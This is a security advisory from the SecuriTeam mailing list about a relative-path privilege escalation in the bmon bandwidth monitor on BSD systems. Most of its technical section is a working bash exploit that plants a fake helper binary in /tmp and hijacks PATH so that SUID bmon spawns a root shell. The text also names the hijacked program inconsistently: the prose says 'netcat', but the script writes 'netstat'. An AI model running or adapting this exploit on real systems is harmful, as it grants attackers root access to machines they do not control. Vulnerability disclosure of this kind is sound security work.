The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
BMon Relative Path Privilege Escalation
------------------------------------------------------------------------
SUMMARY
" <http://trash.net/~reeler/bmon/> Bmon is an interface bandwidth monitor
using the curses library. It's able to compute and draw three types of
diagrams (overview, graphical, and detailed). The overview diagram is a
list of all interfaces including the rx/tx rates of each interface. The
graphical diagram is a bar graph in ASCII. All diagrams are continously
updated."
When Bmon is installed SUID, a malicious attacker can override default
system path and execute arbitrary commands under root privileges.
DETAILS
Vulnerable Systems:
* Bmon version lower than 1.2.1_2
When bmon is executed with the -n parameter it popen()s netcat but fails
to provide an absolute path. some bsds are configured with acls that don't
allow setuid files to run except those that are explicitly allowed, so
creating a file called netcat that chmod's +s bash wouldn't work, bash
needs to run directly by bmon which uses ncurses, so to get a useable
shell we need to redirect stdout to stderr (stdout is closed), and restore
the stty settings.
Exploit Code:
Presented below is a local exploit code for *BSD systems.
#!/usr/local/bin/bash
# Written by Idan Nahoum. idanna@bk.ru
# local exploit for FreeBSD/OpenBSD with bmon < 1.2.1_2 installed.
# when bmon is executed with the -n parameter it popen()s netcat
# but fail to provide an absoluth path.
# some bsds are configured with acls that doesnt allow setuid files to
# run except those that are explicity allowed, so creating a file called
# netcat that chmod's +s bash wouldnt work, bash needs to run directly by
# bmon which uses ncurses, so to get a useable shell we need to redirect
# stdout to stderr (stdout is closed), and restore the stty settings.
# http://www.vuxml.org/freebsd/938f357c-16dd-11d9-bc4a-000c41e2cdad.html
declare -r SPATH="${PATH}"
declare -r STTY_EXEC=$(which stty)
declare -r STTY_SETTINGS=$(${STTY_EXEC} -g)
declare -r QSHELL="/usr/local/bin/bash"
declare BMON_EXEC="/usr/local/sbin/bmon"
echo "$0 [default: ${BMON_EXEC}]"
[ "$#" -gt "0" ] && BMON_EXEC="${1}"
[ -x "${BMON_EXEC}" ] ||
{
echo "${BMON_EXEC} not found"
exit
}
cd /tmp
# apparently bmon closes stdout, so we run a shell with stdout redirected
# to stderr.
cat > ./netstat <<EOF
${STTY_EXEC} ${STTY_SETTINGS}
PATH=${SPATH} /bin/sh 1>&2
EOF
/bin/chmod 755 ./netstat
echo "trying to exploit"
PATH=./ "${BMON_EXEC}" -n
ADDITIONAL INFORMATION
The information has been provided by <mailto:idanna@bk.ru> Idan Nahoum.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
